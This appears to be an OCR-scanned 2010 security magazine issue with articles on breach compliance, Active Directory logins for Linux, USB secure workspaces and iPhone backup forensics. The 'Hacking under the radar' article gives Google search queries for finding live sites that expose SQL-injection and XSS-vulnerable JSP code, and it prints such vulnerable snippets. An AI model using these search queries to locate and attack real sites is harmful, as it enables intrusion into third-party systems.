volves working with the client's IT manage- 
ment, staff, and counsel to remediate the 
situation. As far as our healthcare customers 
are concerned, a big new challenge is the re- 
quirement to comply with the HITEC Act's risk 
assessment. We conducted a survey and 
found that all of the respondents indicated that 
they are spending at least 50% more time in- 
vestigating and performing risk assessments 
on data breach incidents since the HITECH 
Act became effective. This is putting signifi- 
cant strain on the IT organization to meet 
compliance requirements. 

We recommend to organizations to consider 
the following questions in order to get a better 
sense of their privacy program risk and 
maturity: 

• Corporate Governance - Does the organi- 
zation have clear accountability and visibility 
from the boardroom to frontline privacy opera- 
tions? 

• Privacy and Security Office Operations - 

Does the privacy office develop, implement, 
and monitor organizational processes that ad- 
dress all facets of confidentiality and 
customer/patient, and employee/staff privacy? 

• Resource Allocation - Has the privacy and 
security office identified and prioritized the re- 
sources and budget necessary to maintain the 
privacy and security of the organization's per- 
sonal and sensitive information? 

• Management Reporting - Does the privacy 
and security office maintain a system of man- 
agement reporting that provides the organiza- 
tion with timely and relevant information in all 
areas of privacy risks and effectiveness? 

Practical implications for privacy best 
practices 

Security and privacy professionals face a 
daunting challenge with the evolving threat 
vectors and the changing regulatory land- 
scape. For those with deep knowledge and 



awareness of these forces and the ability to 
manage them, there are significant career re- 
wards and opportunities. 

As you review your overall data breach risk 
and compliance environment, here are some 
suggested best practices to consider. We have 
found that many organizations are lacking 
some or most of these practices, which makes 
them highly vulnerable. These practices can 
be performed internally and/or using external 
resources: 

• Keep track of a myriad of federal and state 
level laws and regulations concerning 
customer/patient and staff privacy. 

• Conduct annual privacy and security risk as- 
sessment and quantify and communicate the 
risks from an overall business perspective. 

• Implement staff training and awareness pro- 
grams. 

• Communicate with third parties and partners 
and verify privacy policy compliance. 

• Develop an incident response plan and des- 
ignate a cross-functional response team. 

• Implement a breach incident risk assessment 
process that is consistent, efficient, and pro- 
vides sufficient guidance to meet regulatory 
requirements and approval from counsel. 

• Measure, track, and communicate key pri- 
vacy and security program performance 
metrics and risks. 

The good news for IT professionals responsi- 
ble for security and privacy initiatives is that 
organizations are becoming more educated 
and sensitized to the business risks posed by 
data breach incidents. 

There is a growing number of external re- 
sources available that can help organizations 
identify specific privacy-related threat vectors 
and best practices to reduce the risks. Lever- 
aging internal and external data and resources 
to guide your IT investment for maximum im- 
pact is possible today. Simply enhancing your 
speed of patching may only get you a 2% re- 
duction in risk. 



Rick Kam is President and Founder of ID Experts (www.idexpertscorp.com). The company has managed hun- 
dreds of data breach incidents for healthcare organizations, corporations, financial institutions, universities and 
government agencies. He is an expert in privacy and information security. His experience is leading organiza- 
tions in policy and solutions to address protecting PHI/PII and remediating privacy incidents and identity theft. 
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Gartner Security & Risk 
Management Summit 2010 

22 - 23 September 201 0 I Park Plaza Westminster Bridge, London, UK 
europe.gartner.cam/security 



Information Security 

Data Loss Preve 

Governance 

k Management iffi 

Identity & Access Management 



Embrace Your Challenges in Security and Business in 2010: 
The Year We Make Contact 



The Gartner Security & Risk Management Summit will give you the 
information you need to create a layered approach combining risk 
management and compliance, secure business enablement and 
infrastructure protection. Hear the latest analysis revealing market trends, 
opportunities and threats to you and your company, 

Benefits of Attending 

■ Understand emerging threats and your best defenses 

• Sharpen your security strategy and tighten your tactics 

• Sharpen the way you communicate security to the business 

• integrate security in all processes and applications 

■ Drive down the cost of compliance while harvesting the benefits 

■ Better manage all kinds of risk 



SUMMIT CO-CHAIRS 




View the full agenda online at europe.gartner.com/security 




Carsten Casper 

Research VR 
Gartner 



Tom Scholtz 

Research VR 
Gartner 



Agenda Tracks 

Track 1 : Protecting Your Infrastructure 
and Managing Your Identities 

Track 2: Good Governance Enables 
and Needs Good Risk Management 

Track 3: A Strategic Vision for 
Security and Risk Management 
Leaders 



Gartner. 

Security & Risk 
Management 
Summit 2010 

europe.gartner.com/security 



EARLY BIRD SAVINGS 

t Register by 23 July 201 0 and save €300 



Register Now 

eu rope.gartrier, com/ security 

Tel: +44 208 879 2430 

Email: emea. registration@gartner.com 



If your environment consists of mixed operating systems, it is important to 
deploy authentication mechanisms that will work on any system, against a 
central point, and securely. This allows for proper auditing and accounting for 
compliance and administration. Using Likewise Open (www.likewise.com), 
you can authenticate and authorize users on Linux, UNIX, and Mac OS X 
through Microsoft's Active Directory. Some of the benefits are a single user- 
name and password for users, improved security, and granular account man- 
agement. Likewise Open is provided under the terms of the GNU General Pub- 
lic License and the GNU Library General Public License. 



The following article will describe how to de- You will need to make sure your Active Direc- 

ploy Likewise Open on Ubuntu 9.10 Server tory configuration supports Simple Authentica- 

Edition, but can also be followed for deploy- tion and Security Layer (SASL) mechanisms, 

ment on other Linux and UNIX operating To do so, run the following query (you will 

systems. need Idap-utils to do it): 



root@ubuntu : /tmp# ldapsearch -H ldap : //winserver2008 .mydomain . com -s base -LLL 

supportedSASLMechanisms -x 

dn: 

supportedSASLMechanisms : GSSAPI 
supportedSASLMechanisms : GSS-SPNEGO 
supportedSASLMechanisms : EXTERNAL 
supportedSASLMechanisms : DIGEST-MD5 
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Four SASL mechanisms are supported. SASL 
is a framework for providing authentication 
and data security services in connection- 
oriented protocols. The dominant GSSAPI 
mechanism implementation in use today is 
Kerberos, which is an integral part of Win- 
dows 2000 Active Directory implementations. 



Kerberos will provide authentication and 
strong cryptography over the network. 

Get the latest version of Likewise Open from 
www.likewise.com, move the installer file to a 
temporary directory and make it executable. 
The installation requires you to be logged in 
with a super user account. 



cd /tmp 

wget http : //www . likewise . com/YourOperatingSystemsCurrentRelease 

chmod 555 LikewiseIdentityServiceOpen-5 .3.0. 7766-linux-i386-deb . sh 

Run /tmp/LikewiseIdentityServiceOpen-5 . 3 . 0 . 7766-linux-i386-deb. sh to install 



Follow the prompts to accept the licensing 
agreement and the default installation options. 

Configuring Likewise Open 

The Installation and Administration Guide 
Likewise provides on their website is very 
thorough and I recommend reading it at some 
point so that you might fully understand each 
component. 

The options I chose for my setup have proved 
to be secure, yet easy on the users. The con- 
figuration file is located at 

/etc/likewise/lsassd. conf . Each section 

of the configuration file I have modified is de- 
scribed below. Section headings are in bold 
text, followed by the option chosen and an 
explanation. 

[pam] 

log-level = info 

You have the option of controlling the verbos- 
ity of logging. I would recommend setting this 
to informational if your log server can handle 
the traffic. Take some time to review the logs 
to find out what your organization needs for 
auditing and compliance, and then adjust the 
log level accordingly. 

display-motd = yes 

Every organization should have an Accept- 
able Use Policy (AUP) for computer systems. 
In cases where there isn't one or when you 
want to remind users of what that policy is, 
you can utilize a Linux server's message of 
the day at log on. You can change it to any- 
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thing from a short legal statement to your full 
AUP for Linux servers or workstations. How 
the MOTD is displayed may differ across 
systems. 

user-not-allowed-error = Access de- 
nied. Wrong username or password. 

If authentication fails, it is important to let the 
users know. It is confusing when you try to log 
into a system and you don't know why you are 
being denied access. You can even add a 
support phone number or e-mail address. 

[auth provider:lsa-activedirectory-provider] 

login- shell- template = /bin/bash 

The login shell is something particular to indi- 
vidual needs or preferences. Once users are 
logged in, they can type the name of the shell 
they want, provided that shell is available. 

homedir- template = /home/%U 

The default template is %H/iocai/%D/%u, 
which sets the home directory path to /home/ 

local/domain/username. The default direc- 
tory for users in Linux is /home/username. If 

the servers you are deploying Likewise Open 
on have already been in production, then us- 
ers are already used to logging in and getting 
the /home/usemame directory path. This also 
prevents you from having to transfer any files 

from /home/username to /home/local/ 
domain/username. 

ldap-sign-and-seal = true 



Unless you have a need for plaintext LDAP 
traffic, I would suggest leaving signing and 
sealing on all the time. The authentication it- 
self is not plaintext since you are using Kerbe- 
ros. It is just the actual LDAP request and re- 
sponse data that is plaintext, unless you use 
sealing which uses LDAP over SSL (LDAPS). 
To enable LDAPS, a valid certificate must be 
installed on the Domain Controller. 

assume-default-domain = yes 

Un-comment this option so that users do not 
have to type in the domain name before their 
username, such as login: mydomain\user- 
name. Leave this option commented out if 
multiple domains are in use. 

require-membership-of = UnixLinux 



This option restricts access only to authorized 
groups and users. You will need to create a 
user group of which people can be members 
of on the Domain Controller. You can also add 
user accounts to the require-membership-of 
option, but I would recommend not doing this 
to minimize administration overhead. It may 
be required to create different groups for 
specific servers to further limit access. 

[auth provider:lsa-local-provider] 

Use the same settings configured in the pre- 
vious section for duplicate entries such as the 
login shell and home directory template. 

After changing the settings in isassd.conf, 
you must force the Likewise agent to refresh 
by executing the following command with 
super-user privileges: /opt/likewise/bin/ 

lw-ref resh-conf iguration. 



root@ubuntu ;/# /opt /likewise /bin /lw-ref resh-conf iguration 
Configuration successfully loaded from disk, 
root@ubuntu:/# I 



Using Likewise Open 

You are now ready to join a Linux server to 
the domain. You will need an account with 



domain join privileges or an Administrator. 
Use the domain join-cii script to accomplish 
this. I have already created a computer group 
in the Domain Controller called UnixLinux. 



root@ubuntu;™# /opt/likewise/bin/domainjoin-cli join — ou Corp/Computers/Servers/Uni 

xLinux rnydomain.com matt .grantham 

Joining to AD Domain; mydomain.com 

With Computer DNS Name; ubuntu + mydomain + com 

matt ,grantham@MY DOMAIN .DOM's password ; 
SUCCESS 

root@ubuntu;™# I 



If successful, this server will populate the UnixLinux group in your Domain Controller. 



Active Directory Users and Computers 


Name | Tvpe 


Description 


E l3 Saved Queries 


' L UBUNTU Computer 


UBUNTU 


B Jfg rny domain. corn 




B [3 Builtin 




El Computers 




E 33 Corp 




E Computers 




E ;3j Servers 




UnixLinux 




E l2 Windows 2008 




E |Bj Workstations 




E 2 Groups 




B i]L Domain Controllers 




E [3 ForeignSecurityPrindpals 




B [3 Users 
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You will also need a user group called UnixLinux. Add users to this group, since Likewise is config- 
ured to allow only those who are in it to log in. 



Active Directory Users and Computers 
El l3 Saved Queries 
□ mydornain.com 
Cfj Builtin 
El 13 Computers 
B 3j Corp 

B ,2] Computers 

Groups 
,3l Domain Controllers 
B l3 ForeignSecurityPrincipals 
2fj Users 



Name 



Type 



Description 



SqTT Security G. 

'P.InfbrmationSecurity Security G. 

Ji^DataCenter Security G. 

^UnixLinux Security G. 



1 UnixLinux Properties 










General Members 1 Member Of | Managed By j 






Members: 








Name 


Active □rectory Domain 5 






' John Doe 
^, Matt .Grantham 


mydomain .com/Users 
mydomain .com/Users 



Test your login credentials for John Doe. 

j^P john.doe©ubuntu: ~ | ■ □ [H 



login as: john. doe 

Using keyboard-interactive authentication. 
Password: 

Linux ubuntu 2.6. 31-14-genexic #48-Ubuntu SMF Fri Oct 16 14:04:26 UTC 2009 i636 

Use of this confute r to engage in any activity which constitutes 

violation of local, state, and/or federal law, including, but not 

restricted to, copyright law is strictly prohibited 

Last login: Thu Apr 2 9 13:04:00 2010 from 192.168.127.1 

Z. o r. n . do e @ Jb untu : ~ £ p wd 

/ home / j ohn . do e 

john. doegubuntu: ~S | 



The log in for user John Doe in Active Directory is successful. 



With the rise of compliance risks and auditing, 
this move gives administrators a way to track 
user activity at one central point. A Kerberos 
authentication ticket is generated in Active Di- 
rectory upon logging into a Linux server with 
Likewise Open installed. 

Domain credentials now take the place of 
static Linux accounts, which eliminates the 
task of managing users on each server. 



Password policy enforcement can be the 
same with Linux users as it is with Windows 
users. These are just some of the many 
benefits of using Likewise Open. 

For more advanced features and functionali- 
ties such as group policy management, ad- 
vanced reporting features, and directory mi- 
gration, demo the Enterprise version of 
Likewise Open. 



Matt Grantham is an experienced security professional currently working as a Network Security Engineer. He 
has a bachelor's degree in Information Technology and holds the CEH certification. He can be reached at 
mattgrantham@hotmail.com and www.whitehatmatt.blogspot.com. 
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MD:Pro is a vast malware repository with a huge collection 
of samples, for the purposes of analysis, testing and malware 
research. It is a paid service, aimed at corporate applicants only. 

http://www.frame4.net 
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Hacking under the radar 



by Jerry Mangiarelli 



J 



Whether the targets are selected for financial or political reasons, today's 
web-based attacks have two things in common: they are subtle and they are 
precise. But, the first characteristic is the one that gives headaches to the 
individuals that are charged with monitoring malicious activity. 



With this article I intend to put the spotlight on 
the process of discovering web-based appli- 
cation vulnerabilities, the exploitation of which 
(and the consequent compromises) can go 
undetected for weeks, months, and even 
years. 

To ensure that your web applications are se- 
cure, the application code is run through the 
security stages of the software development 
lifecycle, manual or automated source code 
analysis, and automated web scanners. 

Attackers probe for vulnerabilities by submit- 
ting exploit strings or modifying parameters, 
hoping that a response will provide them with 
the information needed for the exploit. Web 
applications are dependent on many different 
technologies (web servers, operating sys- 
tems, etc). Attackers target various areas of 
this technology stack in order to identify vul- 
nerabilities that can be exploited for executing 
chained attacks - attacks in which finding one 
weakness enables the attackers to locate 
other exposed components and fully 



compromise the system. 

Finding vulnerabilities 

My research began by attempting to locate 
the first area of the stack that is vulnerable. 
Web servers are notorious for having often 
misconfigured file permissions or, in some 
cases, for combining web content and appli- 
cation source code in the same document 
root. It is considered extremely risky when 
application source code is available for public 
viewing, because this gives the attackers the 
opportunity to perform a specific search for 
web application vulnerability and to manually 
review the code in order to find a vulnerability, 
making sending exploits or triggering a detec- 
tive device unnecessary. 

Finding SQL Injection (SQLi) vulnerabili- 
ties 

The following example illustrates how Google 
can be used to search for SQLi vulnerabilities. 
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The query is as follows: 
f iletype : j sp intext : stmt . executeQuery 



The query starts with locating the file type 
"JSP" intext: locates any instance where the 
body of the text contains the vulnerable API 
"stmt.executeQuery". A manual review of 10 
pages (Jsp) revealed 7 SQLi vulnerabilities. 
The code below displays an SQLi vulnerability 



based on the vulnerable API search. In some 
situations, if the page isn't rendered to display 
the source code, one must perform a "view 
source" to view the static/dynamic source 
code. 



stmt=connection . createStatement ( ) ; 

String query="select * from v "+request . getParameter ( "Category" ) +" 
by x Brand_ID x "; 

rs=stmt. executeQuery (query) ; 



order 



' Finding Cross-Site Scripting (XSS) 
; vulnerabilities 

j In this next example, locating a page that con- 
; tains XSS vulnerabilities is just as easily 



achievable as in our previous example. In this • 

instance, the search is explicitly locating files : 

of your choice; this example narrows our '. 

search to "index.jsp" exclusively. • 



inurl : index . j sp intext : request . getparameter ( ) 



: Our search criteria returned a number of re- 
suits that located "index.jsp" pages with the 
j API of "getParameter". The API is used to re- 
: turn the value of a request parameter passed 



as query string. A manual review of 10 pages 
revealed 67 XSS (persistent and reflected) 
vulnerabilities. 



UFirstName = request . getParameter ( "Firs tName" ) ; 

<input type="text" value="<%=UFirstName%>" name=" Firs tName" size="15"> 



The provided examples reveal the easiness of 
locating vulnerabilities. The vulnerability 
search is not limited to XSS and SQLi. Utiliz- 
ing other unsafe APIs will provide the same 
results: OS execution (Runtime.getRuntime) 
or vulnerabilities associated with other pro- 
gramming techniques such as PHP, Perl, ASP 

(for instance, inurl : default . asp 
intext : Response .Write). 

The benefit of reviewing source code is 
proved when one attempts to bypass the pro- 



tective measures. For instance, the ability to 
review the constructed input validation allows 
for the ability to evade the validation. In addi- 
tion, source code comments help to explain 
the internal workings of the application and to 
identify business logic vulnerabilities. 

I like the saying "What is old, is new again". 
When you think about it, the techniques de- 
scribed within this article use the same ap- 
proach we have been witnessing for years, 
but we're introducing the ability to locate 
vulnerabilities "under the radar". 



Jerry Mangiarelli is an IT Security Specialist with TD Bank Financial Group. He has spent the last 9 years as- 
sessing and researching web applications. He continues to present his research techniques and results at 
many seminars and conferences, such as EC-Council, SecTor and Federation of Security Professionals. 
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SOURCE Barcelona 2010 (www.sourceconference.com) 
Barcelona, Spain, 21-22 September 2010. 
Use discount code SOURCEHN10 to get 15% off your ticket price. 

Brucon 2010 (www.brucon.org) 
Brussels, Belgium. 24-25 September 2010. 

RSA Conference Europe 2010 (bit.ly/rsa20i0eu) 
London, United Kingdom. 12-14 October 2010. 

InfoSecurity Russia 2010 (www.infosecurityrussia.ru) 
Moscow, Russia. 17-19 November 2010. 



Securecomm 2010 (www.securecomm.org) 
Singapore. 7-10 September 2010. 

Gartner Security & Risk Management Summit (europe.gartner.com/security) 

London. 22-23 September 2010. 

2nd International ICST Conference on Digital Forensics & Cyber Crime 

(www.d-forensics.org) 
Abu Dhabi, UAE. 4-10 October 2010. 

ISSE 2010 (www.isse.eu.com) 
Berlin, Germany. 5-7 October 2010. 

GRC Meeting 2010 - Lisbon/Portugal (www.grc-meeting.com) 
Lisbon, Portugal. 28-29 October 2010. 
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AppSource Analytics 



AppSourceAnalytics platform is unique hybrid model for web application, site and 
software security. It is Software as a Service (SaaS) for the enterprise. 

Blueinfy has designed and developed a technology platform to assess source code using 
a combination of static source code analysis along with dynamic simulations. The platform 
is capable of processing several different languages and frameworks to determine possible 
security vulnerabilities in enterprise applications and generate accurate reports. 




USA: +17146563652 




Infosecurity Europe is held every year in London. The event provides a free education program, 
exhibitors showcasing new and emerging technologies and offering practical and professional ex- 
pertise. (IN)SECURE Magazine was at the show and here are some images from the show floor. 
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This year's show was the busiest and most successful show to date with 324 exhibitors on the 
show floor and 12,556 unique visitors through the door (excludes exhibitors and repeat visits). 




The keynote program addressed the security issues and pressures that organizations face in an 
increasingly mobile and global working environment. Leading security experts, industry innovators 
and speakers from the end-user community provided expert analysis, real-life case studies, 
strategic advice and predictions. 

The program included speakers from eBay, Lloyds, Camelot, Lufthansa, Network Rail and 
Barclays. 
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Remote workers dream of accessing their files and applications anytime, 
anywhere. But how do you stop that dream from becoming a security night- 
mare? Here's a look at the evolution of secure virtual workspaces. 



Over the past decade, enterprises have expe- 
rienced a significant increase in workforce 
mobility. Employees routinely connect to their 
offices from home PCs via VPN connections, 
use wireless hotspots in airports, and receive 
work emails on smartphone devices. What's 
more, organizations are offering access to 
partner and contractors. 

While this drive for "anytime, anywhere" ac- 
cess to applications and resources offers ad- 
vantages in terms of productivity and effi- 
ciency, it also introduces a number of signifi- 
cant security risks to the enterprise. 

First, there's the diversity of remote access 
methods being used for business. Some em- 
ployees will use company laptops or home 
PCs to connect to the office via VPN links; 
some will process work emails on smart- 
phones or handheld devices. Another group 
may use wireless hotspots or Internet kiosks 
in public areas, or log in from PCs at partner 
or customer sites. 



laptops and smartphones are all too easily lost 
or stolen, and often lack encryption - making 
them easy prey for thieves. 

Information such as passwords, login creden- 
tials, and sensitive files can be left behind on 
untrusted devices at the end of a remote ac- 
cess session, making it available to subse- 
quent users. And of course there's the ever- 
present threat of malware, spyware and mali- 
cious attacks, both from the web and from 
unsecured PCs. 

Last, but by no means least, there's the sheer 
cost of owning and managing a fleet of corpo- 
rate laptops or portable devices, to allow mo- 
bile working. These costs include the pur- 
chase price, software licensing, security appli- 
cations, managing updates and patches, re- 
pairs and replacements, and so on. 

The checklist for remote working 

Businesses need a solution that: 



Some of these remote endpoints are fully 
managed and under the control of the busi- 
ness IT team; others may be completely inse- 
cure and unmanaged. Extending secure ac- 
cess across this wide range of methods and 
devices is a headache for any organization. 



• Gives flexible and secure access to informa- 
tion resources and applications from almost 
any location and type of PC. 

• Keeps sensitive data secure at all times 
against loss, theft or hacking. 



Second, enterprises need to protect their sen- • And is cheaper to deploy and manage than a 
sitive company or customer information data traditional laptop PC, to help reduce the total 
against the risks of data breaches. Corporate cost of ownership (TCO). 
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Ideally, the solution should also work seam- 
lessly and transparently for remote workers, 
so they can use their time productively. Users 
shouldn't have to waste time on issues such 
as unnecessary re-authentication or connec- 
tion issues when using VPNs. Nor should they 
have to remember to encrypt individual files or 
documents when they are copying or saving 
their work. The solution must also be unobtru- 
sive in action, so it doesn't interfere with the 
user's activities, while applying security to pro- 
tect against external threats and the user's 
own mistakes or oversights. 

Meeting this checklist of requirements could 
be fearsomely complex if conventional point 
security products were used - such as sepa- 
rate VPN, anti-virus, encryption, personal 
firewalling and intrusion prevention. 

However, the introduction of virtualization 
technology in recent years has led to the de- 
velopment of a new approach, which greatly 
reduces complexity of remote access security, 
while simplifying central management and er- 
gonomics for the user. This is the secure 
workspace concept. 

Endpoint security on-demand 

This concept was first introduced some four 
years ago, as a feature on advanced remote 
access gateways. These gateways were able 
to deliver 'endpoint security on demand' to the 
user's remote PC, by combining two proc- 
esses: endpoint compliance and secure 
workspace. 

The endpoint compliance process includes: 

• Policy enforcement — the gateway scans 
the remote PC prior to granting access, and 
enforces access policies according to the re- 
sults of the scan. This enables matching of 
access rights to the level the remote PC can 
be trusted, and includes factors such as 
whether security software like antivirus and 
firewall applications are installed and running, 
and determines whether the latest Windows 
patches have been installed. 

• Guest computer security checks — once pol- 
icy enforcement is complete, a remote mal- 
ware scan can be performed to identify and 



remove keystroke loggers, Trojan horses and 
crimeware. 

If the remote PC passes the endpoint compli- 
ance process, then the secure workspace is 
established, to give session confidentiality 
through the VPN tunnel. This includes: 

• An encrypted SSL VPN session with the re- 
mote PC, to protect data input and processed 
while connected. This ensures that no usable 
information remains on the PC when the 
session ends. 

• Cache cleaning on the remote PC at the 
session's end, to erase browser history, down- 
loaded files, clipboard items and so on. To- 
gether with encryption, this helps to remove 
most traces of the session. 

However, while this on-demand approach is 
very useful in both enforcing security and 
enabling relatively flexible remote access, it 
isn't a perfect solution. What happens if the 
remote computer doesn't pass the endpoint 
compliance scan, and isn't allowed to connect 
to the corporate network? In that case, the 
user cannot access the data or applications 
that they need, inhibiting their ability to work - 
unless they can find an alternative PC that 
meets compliance requirements. 

Another issue is that the remote session only 
gives VPN access to certain permitted appli- 
cations. It doesn't give the user access to their 
desktop PC as if they were actually in the 
office. 

Online and offline security 

What's needed is an extension of the on- 
demand approach, which enables the user to 
get secure access to their desktop, and the 
corporate network, from any PC, no matter 
how insecure it is, and no matter what mal- 
ware or other infections it may be carrying. 

Further, if the user cannot set up a VPN ses- 
sion from the remote PC they're using, due to 
connection constraints for example, why not 
enable secure offline access to their desktop 
and data? If this secure workspace can be 
made easily portable, fully managed and with 
always-on, tamper-proof encryption, so much 
the better. 
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A secure PC in your pocket 

For a number of years now, having a personal 
'PC on a flash drive' has been an option for 
users. The main reason is that multi-gigabit 
USB thumb drives are readily affordable. For 
example, IT magazines regularly run features 
on how to create a bootable flash drive that 
contains your preferred applications and data, 
allowing you to carry your PC in your pocket. 
Because of security concerns, this method 
has not, until now, been recommended for 
corporate deployments. 

Conventional flash drives do not easily sup- 
port remote access or security applications, 
such as anti-virus and encryption. Nor do they 
support centralized management. However, 
secure flash drives are now available with on- 



board, automated hardware encryption. This 
imposes mandatory access control on all files 
written to the drive, storing them in a private 
partition that is strongly encrypted and 
password-protected. They can also lock down 
automatically when a specified number of in- 
correct password attempts are made, to se- 
cure stored data in the event of drive loss or 
theft. 

These secure drives also support central 
management by enterprise IT teams. This 
means that drive usage can be monitored, 
complete with records of files written to and 
from the drives (which helps with re- 
provisioning new drives for users in the event 
of loss or theft). Some drives also support re- 
mote termination, which renders them 
unusable if misplaced or stolen. 



WHY NOT USE A SECURE DRIVE AS THE PLATFORM FOR A PORTABLE, 
VIRTUAL WORKSPACE SOLUTION? 



Desktop-to-go 

Why not use a secure drive as the platform for 
a portable, virtual workspace solution? When 
inserted into the USB port of any PC, the solu- 
tion could transform the host into a temporary, 
trusted endpoint with a secure VPN connec- 
tion to the corporate network. 

The solution should present the user with the 
same Windows desktop that they have in their 
office, complete with preferred shortcuts and 
access to documents. These files can be ma- 
nipulated using the host PC's office applica- 
tions, while the user's data remains secure in 
the separate, secure virtual workspace that 
runs parallel to the host environment. This 
would protect the integrity of both local data 
and the corporate network, shielding it against 
malware, hacking attempts and data loss or 
theft. 

But how should the data security components 
of a secure flash drive be extended to deliver 
thus functionality? How do we enable remote 
access and secure, sandboxed sessions on 
the host machine, generated from the user's 
flash drive while keeping the process simple 
and transparent for the user? Let's take a 
closer look at how this can be achieved. 



Creating the secure, virtual workspace 

The goal when creating a virtual workspace is 
to protect the user's session on the host PC 
by enclosing it in a "bubble of security" as 
soon as the session starts up. In this case, the 
session starts when the user inserts their se- 
cure USB drive into the host machine. 

The secure flash drive's firmware would con- 
tain both a login program and a virtualization 
engine. Upon insertion, the login program 
launches and is granted access to the flash 
drive firmware, where the user's sensitive in- 
formation is stored. The user is then pre- 
sented with a login screen, where they enter 
their security credentials. 

Following a successful login, the virtualization 
engine creates a new virtual file system as the 
basis for the secure workspace, and an in- 
stance of the Explorer.exe file is started within 
this virtual system. 

All subsequent processes will be started as 
"child" processes of this new Explorer.exe file. 
This allows applications and the VPN session 
to be controlled inside the newly-created 
secure workspace on the host PC. 
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This process, called precision emulation, 
means there is no large installation on the 
host PC and much lower system memory 
consumption. In turn, this boosts performance, 
and means there is no need for the user to 
track or manage multiple operating systems or 
file systems. The virtualization engine auto- 
matically maintains the virtual system it 
creates. 

Precision emulation and hooking 

The Microsoft Windows NT dynamic-link li- 
brary (NTDLL) acts as a barrier between the 
user environment and the host PC's system 
kernel. The precision emulation process per- 
forms a special sort of hooking on this barrier, 
intercepting application code execution before 
it reaches the NTDLL. 

This process redirects all file and registry 
input/output (I/O) calls for the applications be- 
ing used inside the secure workspace - such 
as Web browsing, word processing, spread- 
sheets and so on - to the user's flash drive. 
This means all applications running inside the 
new secure virtual workspace, including the 
new Explorer.exe, operate in a virtual file sys- 
tem and registry. The virtual files and all regis- 
try data are written to the flash drive instantly, 
and immediately encrypted. 

If an application requests file creation inside 
the secure workspace, the CreateFile Win32 
API function is called. This call is intercepted 
and the file is actually created within the flash 
drive's file system. In effect, this means a se- 
cure channel to the applications stored on the 
host PC is created. This way, the host's appli- 
cations can used to create and edit files, but 
data is not transferred to, nor available on, the 
host PC. This special hooking does not re- 
quire the installation a driver component. It 
dramatically reduces the potential for conflicts 
between the secure virtual workspace and the 
software applications on unmanaged 
computers. 

In this architecture, the memory spaces of ap- 
plications within the secure workspace and 
those of ordinary applications on the host PC 
are not separated, which avoids memory con- 



flicts. In addition to NTDLL, several other Mi- 
crosoft Windows dynamic-link libraries are 
hooked in the same manner, to provide 
additional security. 

Data defenses: Leaving no traces 

The methods described above show how the 
secure, virtual workspace is created and 
managed, enabling the user to take advan- 
tage of the host PC's applications, while en- 
suring the user's data does not touch the host. 

When the user ends the session, the secure 
virtual workspace disappears, and because all 
user and registry data is written to the flash 
drive and encrypted, never reaching the host 
PC, no trace of the session or of the VPN 
connection remains. Even when the solution is 
not in use, all sensitive user information is en- 
crypted on the flash drive, so user credentials, 
information contained in documents, and other 
sensitive data remain protected if the device is 
lost. Additional desirable features include anti- 
keylogging, to protect against malware on the 
host PC that may records keystrokes, and the 
ability to enforce and manage specific security 
policies. Policies should cover the copying of 
files from the secure workspace to the host 
PC, printing of files, and the use of 
certain applications. 

The key to plug-in security 

With this solution, enterprises can provide 
employees, contractors and partners with a 
consistent, controlled, encrypted and secure 
virtual workspace ~ completely independent 
of the host computer. Security teams have the 
ability to enforce mandatory access control on 
all files, which are stored in a hardware- 
encrypted, password-protected partition to 
enable compliance with privacy regulations. 

This USB-based solution is far less expensive 
to purchase and manage than a fleet of lap- 
tops, and automatically applies and enforces 
security without the user's intervention. All to- 
gether, it delivers a pocket-sized, secure work 
environment, whether the user is online or 
offline. 



Nick Lowe is head of Western Europe sales for Check Point (www.checkpoint.com). He is an expert across IT 
security, from technology development and evolving threats to compliance and security reporting. 
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SecureComm 2010 



6th International ICST Conference on 
Security and Privacy in Communication Networks 



7-10 September, 2010 - Singapore 



IC! 



ST.0RG 



SecureComm 2010 - the 6th edition of a successful international 
conference series on Security and Privacy in Communication Networks - 
invites you to vibrant Singapore this year. 

The conference brings together security and privacy experts from academia, 
the corporate world, and the governmental sector, as well as practitioners, 
standards developers, and policy makers. Participants will engage in a 
discussion about common goals and explore important research directions in 
the field of secure communications and networking. 

SecureComm 2010 also serves as a forum to learn about state-of-the-art 
advances in security and privacy research, being the host of the annual 



The GSC initiative awards start-up companies, entrepreneurs and researchers 
from the security technology field with over 500,000 USD in grants, Partici- 
pants of GSC will showcase their innovations in front of venture capitalists 
and the media, as well as government and industry leaders present at 
SecureComm 2010. 






For more information 
visit: www.securecomm.org 
or e-mail: marketing@icst.org 




iPhones have been in use for a while now, and many are backing them up to 
either their own machines or to a machine owned by their current employer. 
I'm here to talk about an option you are offered when backing up your iPhone 
- the Encrypt iPhone backup: 

^ Automatically sync when this iPhone is connected 
l_l Sync only checked songs and videos 
& Manually manage music and videos 



Encrypt iPhone backup | | Change Password. 



I have an iPhone with a few applications in- 
stalled, and I regularly sync it with my 
MacBook Pro. I have a lot of contacts, calen- 
dar entries and various application data on 
the iPhone. One day, my car and everything 
inside it is stolen - including my Mac Book. 
Unfortunately for me, the thieves are not just 
computer savvy, they're part of a large crime 
syndicate that's been targeting not just me but 
my entire organization for a while now. 

They know that I am in charge of the security 
team that safeguards my company's secrets, 
and they know that I am a Mac/iPnone user 
because I have mentioned it in various posts, 
tweets and regular Facebook updates. 



Getting started 

I don't use my MacBook for work, so it is not 
protected quite as well as my work machine. It 
is also not protected by File Vault, because I 
prefer the simplicity of Time Machine as a 
backup solution. 

When I first synced my new iPhone with my 
Mac, I did not check the box that said "En- 
crypt Backups...". Consequently, the ~/ 
Library/Application Support/MobileSync/ 
Backup/xxx directory holds the unencrypted 
backup files for my iPhone. 
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: Basic structure and files 

The xxx portion of the directory structure is a 
unique identifier for my iPhone. It is not re- 
: lated to the IMEI number or anything as dubi- 
ous as that, but it can be matched to the 
i Phone. Within that directory a very large 
amount of files (made up primarily of .mdinfo 
and .mddata files) is stored. There are also 
three files that stand out like a sore thumb: 



Info.plist 
Manifest, pi ist 
Status.plist 

But more on those later. First of all, let's take 
a look at those .mdinfo and .mddata files. 
There are enough of them to warrant a quick 
exploration with some bash/sed/awk/file 
magic: 
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It seems that there are quite a few different 
files here. The images could be somewhat in- 
triguing, but it's the SQLite databases and 



XML documents that will prove to be the most 
interesting: 



ASCII text 

A5CII text, with no line terminators 

Apple binary property list 

DOS executable (device driver) 

GIF image data, version ES9a, 5B6 x 542 

HTML document text 

J PEG image data, EXIF standard 

J PEG image data, EXIF standard 2.21 

J PEG image data, JFIF standard 1.01 

JPEG image data, JFIF standard 1.81, comment 

PDF document, version 1.3 

PDF document, version 1.4 

PNG image, 313 x 480, B-bit/color RGBA, non-interlaced 

PNG image, 323 x 463, B-bit/color RGBA, non-interlaced 

